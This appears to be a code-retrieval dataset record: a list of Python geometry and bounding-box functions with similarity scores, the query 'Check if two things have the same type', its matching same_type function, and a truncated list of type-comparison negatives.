_find_largest_rects_in_hatch(x, y):\n if x < y: # Swap to iterate over the longest side.\n x, y = y, x\n\n rectangles = []\n for i in range(1, x): # Iterate over lower-edge vertices, ignoring corners\n a0, a1 = i, -i # Slope-intercepts for cross-hatch lines running through point (0, i)\n for j in range(1, x): # Iterate over upper-edge vertices, still ignoring corners\n b0, b1 = y - j, y + j # Slope-intercepts for cross-hatch lines running through point (y, j)\n x0, x1 = (a0 - b0) / 2, (b1 - a1) / 2\n if x >= x0 >= 0 and x >= x1 >= 0 and y > -x0 + a0 > 0 and y > x1 + a1 > 0: # All four corners are w/i grid\n rectangles.append(((i, 0), (j, y))) # Pairs of pairs\n # assert len(rectangles) == (2*y - 1) * (x - y) + (y - 1)\n return rectangles", "def gen_crop_area(x_res, y_res, dim):\n crop_area = []\n\n for x in range(math.floor(dim[0] / x_res)):\n for y in range(math.floor(dim[1] / y_res)):\n left = x * x_res\n right = left + x_res\n upper = y * y_res\n lower = upper + y_res\n crop_area.append((left, upper, right, lower))\n\n return crop_area", "def quadkeys_to_bounds(quadkeys: List[str]):\n tile_bounds = [\n mercantile.bounds(mercantile.quadkey_to_tile(qk)) for qk in quadkeys\n ]\n\n minx = 180\n miny = 90\n maxx = -180\n maxy = -90\n for tb in tile_bounds:\n minx = min(minx, tb[0])\n miny = min(miny, tb[1])\n maxx = max(maxx, tb[2])\n maxy = max(maxy, tb[3])\n\n return [minx, miny, maxx, maxy]", "def board_bounds(live_coords):\n if not live_coords:\n return False\n min_x = live_coords[0][0]\n max_x = live_coords[0][0]\n min_y = live_coords[0][1]\n max_y = live_coords[0][1]\n for i, j in live_coords:\n if min_x > i:\n min_x = i\n if i > max_x:\n max_x = i\n if min_y > j:\n min_y = j\n if j > max_y:\n max_y = j\n return [[min_x, min_y], [max_x, max_y]]", "def bbox_from_circle(img, circles):\n seg_imgs = []\n bboxes = []\n aux = img.copy()\n for i,el in enumerate(circles):\n bbox = circle_2_bbox(el['coord'])\n bbox = fix_bbox(bbox,aux.shape)\n cv.rectangle(aux,bbox[0],bbox[1],(0,255,0))\n bboxes.append(bbox)\n return bboxes", "def render(\n xs: np.array,\n ys: np.array,\n x_min: float,\n x_max: float,\n y_min: float,\n y_max: float,\n width: int,\n height: int,\n) -> np.array:\n assert xs.shape == ys.shape\n assert x_max > x_min\n assert y_max > y_min\n assert width > 0\n assert height > 0\n\n x_indices = discretize(np.array(xs), x_min, x_max, steps=width)\n y_indices = discretize(np.array(ys), y_min, y_max, steps=height)\n\n # Invert y direction to optimize for plotting later\n y_indices = (height - 1) - y_indices\n\n # Filter out of view pixels\n xy_indices = np.stack((x_indices, y_indices)).T\n xy_indices = xy_indices[\n (xy_indices[:, 0] >= 0)\n & (xy_indices[:, 0] < width)\n & (xy_indices[:, 1] >= 0)\n & (xy_indices[:, 1] < height)\n ]\n xy_indices = xy_indices.T\n\n # Assemble pixel matrix\n pixels = np.zeros((height, width), dtype=int)\n pixels[xy_indices[1], xy_indices[0]] = 1\n\n return pixels", "def get_patches(points, h, w, patches=[[450, 100, 10, 10], [450, 500, 10, 10]], min_valid_percent=0.75):\n pc_image = points.reshape((h, w, 3))\n pc_patches = []\n for patch in patches:\n possible_patch = pc_image[patch[0]:patch[0] + patch[2], patch[1]:patch[1] + patch[3]]\n possible_patch = possible_patch.reshape(possible_patch.size // 3, 3)\n possible_patch = filter_zero(possible_patch)\n if possible_patch.shape[0] > min_valid_percent * (patch[2] * patch[3]):\n pc_patches.append(possible_patch)\n return pc_patches", "def covering_box(boxes):\n x_min = np.amin([b.x for b in boxes])\n x_max = np.amax([b.x + b.width for b in boxes])\n y_min = np.amin([b.y for b in boxes])\n y_max = np.amax([b.y + b.height for b in boxes])\n cover = Box(x_min, y_min, x_max - x_min, y_max - y_min)\n return cover", "def __areas_to_pool(self, region_width, region_height, region_width_step, region_height_step):\n \n areas = [[(width_ind * region_width_step, height_ind * region_height_step,\n (width_ind + 1) * region_width_step if (width_ind + 1) < self.width else region_width,\n (height_ind + 1) * region_height_step if (height_ind + 1) < self.height else region_height) for width_ind in range(self.width)] for height_ind in range(self.height)]\n\n return areas", "def draw(list_rectangles, list_squares):\n\n art = turtle.Turtle()\n\n def set_position(x, y):\n art.penup()\n art.goto(x, y)\n art.pendown()\n\n def beauty_rectangle(width, height, art):\n art.begin_fill()\n for i in range(2):\n art.forward(width)\n art.right(90)\n art.forward(height)\n art.right(90)\n art.end_fill()\n\n for rectangle in list_rectangles:\n art.color(\"#800080\")\n set_position(rectangle.x, rectangle.y)\n beauty_rectangle(rectangle.width, rectangle.height, art)\n set_position(-1 * rectangle.x, -1 * rectangle.y,)\n\n for square in list_squares:\n art.color(\"#40E0D0\")\n set_position(square.x, square.y)\n beauty_rectangle(square.size, square.size, art)\n set_position(-1 * square.x, -1 * square.y)\n\n turtle.done()", "def extract(pixels, rmin, rmax, cmin, cmax):\n copy = blank_image(rmax-rmin, cmax -cmin) \n for r in range(rmin, rmax):\n for c in range(cmin, cmax):\n copy[r-rmin][c-cmin] = pixels[r][c]\n return copy", "def rect(coords : Tuple[int, int]) -> Tuple[int, int, int, int]:\n min_x = min([x for x, _ in coords])\n max_x = max([x for x, _ in coords])\n min_y = min([y for _, y in coords])\n max_y = max([y for _, y in coords])\n\n return (min_x, max_x, min_y, max_y)", "def del_rectangles(image, rects):\n for r in rects:\n cv2.rectangle(image,\n (r.x, r.y),\n (r.x + r.w - 1, r.y + r.h - 1),\n color=0,\n thickness=-1)", "def bounding_boxes(self, detections):\n bboxes = []\n while len(detections) > 0:\n det = detections.pop(0)\n merging = True\n while merging:\n merging = False\n pointer = 0\n while pointer < len(detections):\n if self.get_distance(det, detections[pointer]) <= self.max_distance:\n det = self.merge_boxes(det, detections[pointer])\n merging = True\n detections.pop(pointer)\n else:\n pointer += 1\n if det[4] >= self.min_area:\n bboxes.append(det)\n return bboxes", "def find_squares( contours, debug=False ):\r\n #=================================================================\r\n # The Minimum and Maximum rations for width vs height for the goal\r\n # based on experimental results goal is approx 1.5:1\r\n #=================================================================\r\n MIN_RATIO = 1.3\r\n MAX_RATIO = 1.8\r\n ret = []\r\n\r\n for shape in contours:\r\n x, y, w, h = cv2.boundingRect( shape )\r\n w_h_ratio = float( w ) / float( h )\r\n if debug:\r\n print \"Area\", (w * h)\r\n print \"Width \", w\r\n print \"Height\", h\r\n if MIN_RATIO < w_h_ratio and w_h_ratio < MAX_RATIO:\r\n ret.append( shape )\r\n\r\n return( ret )", "def find_obstacle_loc(self, obstacle_list):\n\n x_obst = []\n y_obst = []\n #x_obst_append = x_obst.append\n #y_obst_append = y_obst.append\n locs = []\n\n for x in obstacle_list:\n if x < self.width:\n x_obst.append(x*self.resolution + self.resolution/2)\n else:\n x_obst.append((x % self.width)*self.resolution + self.resolution/2)\n\n for y in obstacle_list:\n y_obst.append((y/self.width)*self.resolution + self.resolution/2)\n\n locs = map(lambda x: x, zip(x_obst, y_obst))\n\n return(locs)", "def obscure(rects):\n image = Image.open('/tmp/.i3lock.png')\n\n for rect in rects:\n area = (\n rect.x, rect.y,\n rect.x + rect.width,\n rect.y + rect.height\n )\n\n cropped = image.crop(area)\n cropped = obscure_image(cropped)\n image.paste(cropped, area)\n overlay = Image.open('/home/robin/Documents/source/scripts/src/locked.png')\n image.paste(overlay, tuple([(i-o)/2 for i,o in zip(image.size,overlay.size)]), overlay)\n image.save('/tmp/.i3lock.png')", "def extract_roi(reg_with_roi, ir_with_roi, reg_unmarked, ir_unmarked):\n roi_pos = np.where( reg_with_roi[:,:,2] == 255 ) \n \n x = list(roi_pos[0])\n y = list(roi_pos[1])\n \n #make a 2-d mask\n \n mask = np.zeros_like(reg_with_roi[:,:,1])\n mask[x,y] = 255\n \n _, cntrs = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[:2]\n\n reg_roi_list = []\n ir_roi_list = []\n \n #masks = []\n for cnt in cntrs:\n \n if reg_unmarked.ndim == 3:\n reg_unmarked = cv2.cvtColor(reg_unmarked, cv2.COLOR_BGR2GRAY)\n \n if ir_unmarked.ndim == 3:\n ir_unmarked = cv2.cvtColor(ir_unmarked, cv2.COLOR_BGR2GRAY)\n \n temp_mask = np.zeros_like(reg_unmarked)\n cv2.fillPoly(temp_mask, [cnt], (255,255,255))\n #masks.append(temp_mask)\n \n reg_roi = cv2.bitwise_and(temp_mask, reg_unmarked)\n ir_roi = cv2.bitwise_and(temp_mask, ir_unmarked)\n \n x, y, w, h = cv2.boundingRect(cnt)\n reg_roi = reg_roi[y:y+h, x:x+w]\n ir_roi = ir_roi[y:y+h, x:x+w]\n \n reg_roi_list.append(reg_roi)\n ir_roi_list.append(ir_roi)\n \n return reg_roi_list, ir_roi_list, cntrs", "def get_squares(x, y, width, height):\n return product(range(x+1, x+width+1), range(y+1, y+height+1))", "def bisect_rectange(numSplits, minlat, minlong, maxlat, maxlong):\n #initialize function variables\n longpoints = []\n latpoints = []\n extents = []\n\n #Get a list of the split lat/long locations in the rectangle\n for i in range(numSplits+1):\n latpoints.append( (minlat + ((maxlat-minlat)/numSplits)*i) )\n longpoints.append( (minlong + ((maxlong-minlong)/numSplits)*i) )\n\n #Loop through the line locations and create a list of sub-rectangles\n for latindex, latmin in enumerate(latpoints):\n for longindex, longmin in enumerate(longpoints):\n if latindex<(len(latpoints)-1) and longindex<(len(longpoints)-1):\n newextent = [latmin, longmin, latpoints[latindex+1], longpoints[longindex+1]]\n extents.append(newextent)\n return extents", "def crop(self, rect):\n maybe_cropped_area = self.to_bbox().crop(rect)\n if len(maybe_cropped_area) == 0:\n return []\n else:\n [cropped_area] = maybe_cropped_area\n cropped_origin = PointLocation(row=cropped_area.top, col=cropped_area.left)\n cropped_area_in_data = cropped_area.translate(drow=-self._origin.row, dcol=-self.origin.col)\n return [MultichannelBitmap(data=cropped_area_in_data.get_cropped_numpy_slice(self._data),\n origin=cropped_origin,)]", "def _find_largest_Rectangles_in_cross_hatch(x, y):\n if x < y: # Swap to iterate over the longest side.\n x, y = y, x\n\n rectangles = []\n for i in range(1, x): # Iterate over lower-edge vertices, ignoring corners\n a0, a1 = i, -i # Slope-intercepts for cross-hatch lines running through point (0, i)\n for j in range(1, x): # Iterate over upper-edge vertices, still ignoring corners\n b0, b1 = y - j, y + j # Slope-intercepts for cross-hatch lines running through point (y, j)\n x0, x1 = (a0 - b0) / 2, (b1 - a1) / 2\n if x >= x0 >= 0 and x >= x1 >= 0 and y > -x0 + a0 > 0 and y > x1 + a1 > 0: # All four corners are w/i grid\n rectangles.append(Rectangle((i, 0), (j, y), aligned_with_grid=False))\n # assert len(rectangles) == (2*y - 1) * (x - y) + (y - 1)\n return rectangles", "def cuts(self) -> list[list[int]]:\n if self._cuts is not None:\n return self._cuts\n width = self.width\n height = self.height\n screen_region = Region(0, 0, width, height)\n cuts_sets = [{0, width} for _ in range(height)]\n\n if self.map is not None:\n for region, order, clip in self.map.values():\n region = region.intersection(clip)\n if region and (region in screen_region):\n region_cuts = region.x_extents\n for y in region.y_range:\n cuts_sets[y].update(region_cuts)\n\n # Sort the cuts for each line\n self._cuts = [sorted(cut_set) for cut_set in cuts_sets]\n return self._cuts", "def surround(self, p):\n res = set([])\n if p.x + 1 < self.height:\n res.add((p.x + 1, p.y))\n if p.y + 1 < self.width:\n res.add((p.x + 1, p.y + 1))\n res.add((p.x, p.y + 1))\n if p.y - 1 >= 0:\n res.add((p.x + 1, p.y - 1))\n res.add((p.x, p.y - 1))\n if p.x - 1 >= 0:\n res.add((p.x - 1, p.y))\n if p.y + 1 < self.width:\n res.add((p.x - 1, p.y + 1))\n res.add((p.x, p.y + 1))\n if p.y - 1 >= 0:\n res.add((p.x - 1, p.y - 1))\n res.add((p.x, p.y - 1))\n return res", "def uniform_rect(mouth, face, width, height):\n if mouth is None:\n return None\n\n mc_x, mc_y = mouth[0] + 0.5 * mouth[2], mouth[1] + 0.5 * mouth[3] # Mouth center point.\n\n rect_bottom = mc_y + 0.5 * height\n\n rect_x = mc_x - 0.5 * width\n rect_y = mc_y - 0.5 * height - max(0, rect_bottom - (face[2] + face[3]))\n\n return [int(round(i)) for i in [rect_x, rect_y, width, height]]", "def clip_rect(selected_corners: np.ndarray, clipped_uv_verts: np.ndarray) -> np.ndarray:\n prev = selected_corners[-1]\n for corner in selected_corners:\n # interpolate line segments to the image border\n clip_prev, clip_corner = clip_segment_v3_plane_n(\n copy.deepcopy(prev), copy.deepcopy(corner), copy.deepcopy(planes)\n )\n prev = corner\n if clip_prev is None or clip_corner is None:\n continue\n a, b = clip_line_segment(clip_prev, clip_corner, K)\n clipped_uv_verts = np.vstack([clipped_uv_verts, a[:2].reshape(-1, 2)])\n clipped_uv_verts = np.vstack([clipped_uv_verts, b[:2].reshape(-1, 2)])\n\n return clipped_uv_verts", "def framewise_inside_rectangle_roi(\n bp_location: np.ndarray, roi_coords: np.ndarray\n ) -> np.ndarray:\n results = np.full((bp_location.shape[0]), 0)\n within_x_idx = np.argwhere(\n (bp_location[:, 0] <= roi_coords[1][0])\n & (bp_location[:, 0] >= roi_coords[0][0])\n ).flatten()\n within_y_idx = np.argwhere(\n (bp_location[:, 1] <= roi_coords[1][1])\n & (bp_location[:, 1] >= roi_coords[0][1])\n ).flatten()\n for i in prange(within_x_idx.shape[0]):\n match = np.argwhere(within_y_idx == within_x_idx[i])\n if match.shape[0] > 0:\n results[within_x_idx[i]] = 1\n return results", "def get_bounding_box(img):\n rows = np.any(img, axis=1)\n cols = np.any(img, axis=0)\n rmin, rmax = np.where(rows)[0][[0, -1]]\n cmin, cmax = np.where(cols)[0][[0, -1]]\n # due to python indexing, need to add 1 to max\n # else accessing will be 1px in the box, not out\n rmax += 1\n cmax += 1\n return [rmin, rmax, cmin, cmax]", "def get_dancefloor_area(self):\n cords = []\n\n x1 = self.coordinates[0]\n y1 = self.coordinates[1]\n x2 = self.coordinates[0] + self.width\n y2 = self.coordinates[1] + self.height\n if self.width <= 0:\n x1, x2 = x2, x1\n if self.height <= 0:\n y1, y2 = y2, y1\n\n for x in range(x1, x2):\n for y in range(y1, y2):\n if x % 20 == 0 and y % 20 == 0:\n cords.append([x, y])\n return cords", "def test_tiles_to_bounds():\n tiles = [morecantile.Tile(x=150, y=182, z=9), morecantile.Tile(x=151, y=182, z=9)]\n assert len(utils.tiles_to_bounds(tiles)) == 4", "def pixelcode(self):\n\n maxX, maxY = self.size()\n result = bitmap((2*maxX, 2*maxY))\n for x in range(maxX):\n for y in range(maxY):\n pixel = self.get(x,y)\n result.set(2*x,2*y, pixel)\n result.set(2*x,2*y+1, not pixel)\n result.set(2*x+1,2*y, not pixel)\n result.set(2*x+1,2*y+1, pixel)\n return result", "def rectIntersect(rect1, rect2):\n rect = np.zeros_like(rect1)\n rect[[0, 2]] = np.maximum(rect1[[0, 2]], rect2[[0, 2]])\n rect[[1, 3]] = np.minimum(rect1[[1, 3]], rect2[[1, 3]])\n return rect", "def drawRectangle(img, boxs_t, boxs_p, unseenName):\n img_p = img.copy()\n img_t = img.copy()\n for b in boxs_t:\n clas = unseenName[str(b[1])]\n x1, x2, y1, y2 = b[0][0], b[0][2], b[0][1], b[0][3]\n cv2.rectangle(img_t, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.putText(img_t, clas, (x1+10, y1+10), cv2.FONT_HERSHEY_TRIPLEX, 0.5,\n (0, 255, 0), 1)\n\n for b in boxs_p:\n clas = unseenName[str(b[1])]\n x1, x2, y1, y2 = b[0][0], b[0][2], b[0][1], b[0][3]\n cv2.rectangle(img_p, (x1, y1), (x2, y2), (255, 0, 0), 2)\n cv2.putText(img_p, clas, (x1+10, y1+10), cv2.FONT_HERSHEY_TRIPLEX, 0.5,\n (255, 0, 0), 1)\n\n return img_t, img_p", "def compute_bb(self):\n all_shapes = list(self.parts.values()) + list(self.edges.values())\n bbox_vertices = cascaded_union(all_shapes).envelope.exterior.coords.xy\n min_x = min(bbox_vertices[0])\n max_x = max(bbox_vertices[0])\n min_y = min(bbox_vertices[1])\n max_y = max(bbox_vertices[1])\n return [min_x, max_x,min_y, max_y]", "def order_rect(pts):\n new = np.zeros((4, 2), dtype=\"int64\")\n s = pts.sum(axis=1)\n new[0] = pts[np.argmin(s)]\n new[2] = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=1)\n new[1] = pts[np.argmin(diff)]\n new[3] = pts[np.argmax(diff)]\n\n return new" ]
[ "0.66037875", "0.6559397", "0.6555009", "0.65479845", "0.6528629", "0.6455227", "0.6453855", "0.64455384", "0.64104044", "0.6346816", "0.63399655", "0.6339705", "0.62987906", "0.6266192", "0.6236844", "0.61997765", "0.6193706", "0.6171467", "0.6139797", "0.6138508", "0.6129092", "0.608878", "0.6074923", "0.6074048", "0.6070478", "0.606193", "0.602708", "0.602708", "0.6014821", "0.5993206", "0.5988436", "0.59730476", "0.597267", "0.5959723", "0.595754", "0.59543693", "0.5954176", "0.595301", "0.5952399", "0.59333414", "0.5921701", "0.59122294", "0.5909409", "0.5907222", "0.5902377", "0.5901109", "0.58893126", "0.58868074", "0.58768284", "0.5876288", "0.58758223", "0.584782", "0.58456993", "0.5807183", "0.58068895", "0.5800318", "0.57900685", "0.57856506", "0.5783167", "0.57818735", "0.5775326", "0.57704216", "0.5765914", "0.57564783", "0.5746501", "0.574275", "0.5741624", "0.5734667", "0.5725761", "0.5724009", "0.5719628", "0.571714", "0.5711192", "0.57099694", "0.5705798", "0.5703253", "0.5702939", "0.5700136", "0.5695659", "0.56941706", "0.56909925", "0.5685008", "0.56839883", "0.5680029", "0.5678561", "0.5666794", "0.5662827", "0.56615484", "0.5656806", "0.5641095", "0.5634938", "0.5630097", "0.5629734", "0.5626206", "0.5620667", "0.561527", "0.561486", "0.56117773", "0.5602972", "0.5600348" ]
0.6178429
17
Check if two things have the same type.
def same_type(one, two): return isinstance(one, type(two))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _is_equal_same_type(self, other):\n return True", "def is_same(type1, type2):\n nake_type1 = remove_declarated(type1)\n nake_type2 = remove_declarated(type2)\n return nake_type1 == nake_type2", "def sametype(variable1, variable2):\n\n # Return the result\n return isinstance(variable1, type(variable2))", "def _is_equal_same_type(self, other):\n # id\n self_id = self.id\n other_id = other.id\n if (self_id and other_id) and (self_id != other_id):\n return False\n \n # bot\n if self.bot != other.bot:\n return False\n \n # description\n if self.description != other.description:\n return False\n \n # icon_hash\n if self.icon_hash != other.icon_hash:\n return False\n \n # icon_type\n if self.icon_type != other.icon_type:\n return False\n \n # name\n if self.name != other.name:\n return False\n \n return True", "def _values_of_same_type(self, val1, val2):\n if self.f_supports(val1) != self.f_supports(val2):\n return False\n\n if not self.f_supports(val1) and not self.f_supports(val2):\n raise TypeError(\n \"I do not support the types of both inputs (`%s` and `%s`),\"\n \" therefore I cannot judge whether the two are of same type.\"\n % str(type(val1)),\n str(type(val2)),\n )\n\n return type(val1) is type(val2)", "def _assert_input_object_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self.assertEqual(\n set(type1.fields.iterkeys()), set(type2.fields.iterkeys()))\n for name, t in type1.fields.iteritems():\n self.assertEqual(t.type_str(), type2.fields[name].type_str())", "def of_type(self, a):\n return type(a) == type(self.one)", "def _is_equal_same_type(self, other):\n # approximate_online_count\n if self.approximate_online_count != other.approximate_online_count:\n return False\n \n # approximate_user_count\n if self.approximate_user_count != other.approximate_user_count:\n return False\n \n # description\n if self.description != other.description:\n return False\n \n # discovery_splash_hash\n if self.discovery_splash_hash != other.discovery_splash_hash:\n return False\n \n # discovery_splash_type\n if self.discovery_splash_type != other.discovery_splash_type:\n return False\n \n # emojis\n if self.emojis != other.emojis:\n return False\n \n # features\n if self.features != other.features:\n return False\n \n # icon_hash\n if self.icon_hash != other.icon_hash:\n return False\n \n # icon_type\n if self.icon_type != other.icon_type:\n return False\n \n # id\n if self.id != other.id:\n return False\n \n # invite_splash_hash\n if self.invite_splash_hash != other.invite_splash_hash:\n return False\n \n # invite_splash_type\n if self.invite_splash_type != other.invite_splash_type:\n return False\n \n # stickers\n if self.stickers != other.stickers:\n return False\n \n # name\n if self.name != other.name:\n return False\n \n return True", "def check_type_compat(input_a, input_b):\n return return_family_type(input_a) is return_family_type(input_b)", "def is_type_equivalent(self, other):\n mine = self._replace_defaults()\n theirs = other._replace_defaults()\n\n def remove_base(dct):\n # removes base attributes in the phyiscal layer.\n basekeys = Column._replace_defaults(self).keys()\n for k in basekeys:\n del dct[k]\n\n remove_base(mine)\n remove_base(theirs)\n\n return type(self) == type(other) and mine == theirs", "def is_same_type_as_other(cls, other):\r\n return isinstance(other, cls)", "def is_consistent(self, other):\n return self.name != other.name or self.type is other.type", "def _values_of_same_type(self, val1, val2):\n if self.f_supports(val1) != self.f_supports(val2):\n return False\n\n if not self.f_supports(val1) and not self.f_supports(val2):\n raise TypeError(\n \"I do not support the types of both inputs (`%s` and `%s`),\"\n \" therefore I cannot judge whether the two are of same type.\"\n % str(type(val1)),\n str(type(val2)),\n )\n\n if not type(val1) is type(val2):\n return False\n\n # Numpy arrays must agree in data type and shape\n if type(val1) is np.array:\n if not val1.dtype is val2.dtype:\n return False\n\n if not np.shape(val1) == np.shape(val2):\n return False\n\n # For tuples we now from earlier checks that the data is homogeneous.\n # Thus, only the type of the first item and the length must agree.\n if type(val1) is tuple:\n return (type(val1[0]) is type(val2[0])) and (len(val1) == len(val2))\n\n return True", "def pod_equals(x, y):\n return type(x) == type(y) and x.__dict__ == y.__dict__", "def _assert_object_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self._assert_parent_types_equal(type1, type2)\n self.assertEqual(type1.class_descriptor, type2.class_descriptor)\n self.assertEqual(\n set(type1.fields.iterkeys()), set(type2.fields.iterkeys()))\n for name, field1 in type1.fields.iteritems():\n field2 = type2.fields[name]\n self._assert_fields_equal(field1, field2)", "def test_types_are_equal(self):\n self.assertEqual(True, comparator.types_are_equal(None, None))\n self.assertEqual(True, comparator.types_are_equal(True, True))\n self.assertEqual(True, comparator.types_are_equal(True, False))\n self.assertEqual(True, comparator.types_are_equal(int(), int()))\n self.assertEqual(False, comparator.types_are_equal(int(), str()))\n self.assertEqual(True, comparator.types_are_equal(str(), str()))\n self.assertEqual(True, comparator.types_are_equal(list(), list()))\n self.assertEqual(True, comparator.types_are_equal(dict(), dict()))", "def _assert_union_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self._assert_parent_types_equal(type1, type2)", "def __eq__(self, other):\r\n\r\n return type(self) == type(other) and self.ttype == other.ttype", "def is_identical(self, other):\n if self.is_input != other.is_input:\n return False\n\n if self.is_raw() and other.is_raw():\n return True\n if self.is_raw() or other.is_raw():\n return False\n return self.structure.is_identical(other.structure)", "def __eq__(self, other):\n return self.type_id == other.type_id", "def __eq__(self, other):\n if not isinstance(other, Type):\n return False\n\n return self.__dict__ == other.__dict__", "def __eq__(self: 'Cheese', other: 'Cheese') -> bool:\n return isinstance(other, Cheese) and self.size == other.size", "def test_equal_on_type_mismatch(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = \"invalid\"\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __eq__(self, other):\n return (isinstance(other, self.__class__) and\n self.type == other.type and\n self.data == other.data)", "def test_equal_on_type_mismatch(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = \"invalid\"\n\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __eq__(self, other):\n return isinstance(other, self.__class__)", "def __eq__(self, other: Any) -> bool:\n return isinstance(other, Nothing)", "def __eq__(self, other: Any) -> bool:\n if isinstance(other, OutputSpec):\n return type_utils.get_canonical_name_for_outer_generic(\n self.type) == type_utils.get_canonical_name_for_outer_generic(\n other.type)\n else:\n return False", "def type_is_arg_of(type1, type2):\n if (not isinstance(type2, ComplexType)):\n return False\n return (type1 == type2.first)", "def __eq__(self, other) -> bool:\n if not isinstance(other, type(self)):\n return False\n for attribute in self.classes:\n if getattr(self, attribute) != getattr(other, attribute):\n return False\n return True", "def matches(self, other):\n if isinstance(other, type):\n return isinstance(self, other)\n\n return self == other", "def is_same_class(obj, a_class):\n return type(obj) == a_class", "def is_same_class(obj, a_class):\n return type(obj) == a_class", "def __eq__(self,other):\n try: return self.object==other.object and isinstance(self,type(other))\n except: return False", "def is_same_as(self, c_repr):\n return self == Type._from_c_repr(c_repr)", "def __eq__(self, other):\n\n return self.type == other.type and self.value == other.value", "def _check_type_compatibility(self, type_name1, type_name2,\n operation):\n if type_name1 != type_name2:\n raise TypeCompatibilityError(type_name1, type_name2, operation)", "def test_equal_on_type_mismatch(self):\n a = Certificate(\n certificate_type=self.certificate_type_a,\n certificate_value=self.certificate_value_a)\n b = \"invalid\"\n\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __eq__(self, other):\r\n\t\treturn (self.type == other.type and self.value == other.value)", "def __eq__(self, other) -> bool:\n if not isinstance(other, NilpotentOrbit):\n return False\n if self.my_type != other.my_type:\n return False\n if self.lie_rank != other.lie_rank:\n return False\n if self.decorator != other.decorator:\n return False\n return self.my_diagram == other.my_diagram", "def is_same_class(obj, a_class):\n return (type(obj) == a_class)", "def __eq__(self, other: Any) -> bool:\n if isinstance(other, InputSpec):\n return type_utils.get_canonical_name_for_outer_generic(\n self.type) == type_utils.get_canonical_name_for_outer_generic(\n other.type) and self.default == other.default\n else:\n return False", "def is_same_class(obj, a_class):\n return(type(obj) == a_class)", "def is_same_class(obj, a_class):\n if type(obj) == a_class:\n return True\n else:\n return False", "def test_same_type():\n\n for seq, exp in [\n ((1, ), True),\n ((1, 1.0, 1+0j), False),\n ((1, 10, 100), True),\n ((True, False, 10), False),\n (['abc', 'def', 'ghi'], True),\n (np.linspace(0, 1, 100), True),\n ]:\n assert same_type(*seq) == exp\n\n assert same_type(\n True, False, True, False, target_type=bool,\n )\n\n assert not same_type(\n True, False, True, False, target_type=int,\n )\n\n with pytest.raises(ValueError):\n same_type()", "def test_has_exactly_type():\r\n\r\n return has_exactly_type(1, int) and not has_exactly_type(True, int) and has_exactly_type(True, bool)", "def is_same_class(obj, a_class):\n return (type(obj) is a_class)", "def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name\n if type(self) != type(other):\n raise TypeError(\"Types do not match\")\n return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)", "def __eq__(self, other):\n return (isinstance(other, self.__class__) and\n (self.path == other.path) and\n (self.type == other.type))", "def is_same_class(obj, a_class):\n return(type(obj) is a_class)", "def is_same_class(obj, a_class):\n return type(obj) is a_class", "def is_same_class(obj, a_class):\n return type(obj) is a_class", "def is_compatible_to(self, other: 'Signature') -> bool:\n if self is other or self == other:\n return True\n # self.return_type must be compatible to other.return_type\n self_return_type, other_return_type = (self.return_type,\n other.return_type)\n # if self_return_type is None and other_return_type is not None:\n # return False\n # if self_return_type is not None and other_return_type is None:\n # return False\n if not _is_compatible(self_return_type, other_return_type):\n return False\n # other.var_arg_type must be compatible to self.var_arg_type\n self_var_arg_type, other_var_arg_type = (self.var_arg_type,\n other.var_arg_type)\n # if self_var_arg_type is None and other_var_arg_type is not None:\n # return False\n # if self_var_arg_type is not None and other_var_arg_type is None:\n # return False\n if not _is_compatible(other_var_arg_type, self_var_arg_type):\n return False\n # each type in other.arg_types must compatible the corresponding\n # type on self.arg_types\n self_arg_types, other_arg_types = self.arg_types, other.arg_types\n if len(self_arg_types) != len(other_arg_types):\n return False\n return (all((_is_compatible(oat, sat)\n for (oat, sat) in zip(other_arg_types, self_arg_types))))", "def has_exactly_type(obj, tpe):\r\n return type(obj) == tpe", "def type_or_class_match(node_a, node_b):\n if isinstance(node_b['node'], type):\n return issubclass(type(node_a['node']), node_b['node'])\n elif isinstance(node_a['node'], type):\n return issubclass(type(node_b['node']), node_a['node'])\n elif isinstance(node_b['node'], xf.PatternNode):\n return isinstance(node_a['node'], node_b['node'].node)\n elif isinstance(node_a['node'], xf.PatternNode):\n return isinstance(node_b['node'], node_a['node'].node)\n return isinstance(node_a['node'], type(node_b['node']))", "def _values_of_same_type(self, val1, val2):\n if (type(val1) in (np.ndarray, tuple, np.matrix)) and (\n type(val2) is type(val1)\n ):\n return True\n else:\n return super(ArrayParameter, self)._values_of_same_type(val1, val2)", "def is_same_class(obj, a_class):\n return isinstance(obj, a_class)", "def __eq__(self, other: object) -> bool:\n\n if not isinstance(other, self.__class__):\n return False\n\n if not self.simctl_type == other.simctl_type:\n return False\n\n return self.raw_info == other.raw_info", "def __eq__(self, other):\n if isinstance(other, self.__class__):\n if self.type_id != other.type_id:\n return False\n # floats are difficult to check for exact equality...\n if self.data_type == DataType.FLOAT or other.data_type == DataType.FLOAT:\n return isclose(self.data, other.data, rel_tol=1e-06)\n else:\n return self.data == other.data\n else:\n return False", "def test_type_equality(self):\r\n #list of matrices\r\n myType1 = TypedListType(T.TensorType(theano.config.floatX,\r\n (False, False)))\r\n #list of matrices\r\n myType2 = TypedListType(T.TensorType(theano.config.floatX,\r\n (False, False)))\r\n #list of scalars\r\n myType3 = TypedListType(T.TensorType(theano.config.floatX,\r\n ()))\r\n\r\n self.assertTrue(myType2 == myType1)\r\n self.assertFalse(myType3 == myType1)", "def is_same_class(self, other):\n return isinstance(other, Event) \\\n and self.title == other.title \\\n and self.time_start == other.time_start \\\n and self.time_end == other.time_end", "def is_same_class(obj, a_class):\n if type(obj) is a_class:\n return True\n else:\n return False", "def check_types(begin, end):\n try:\n 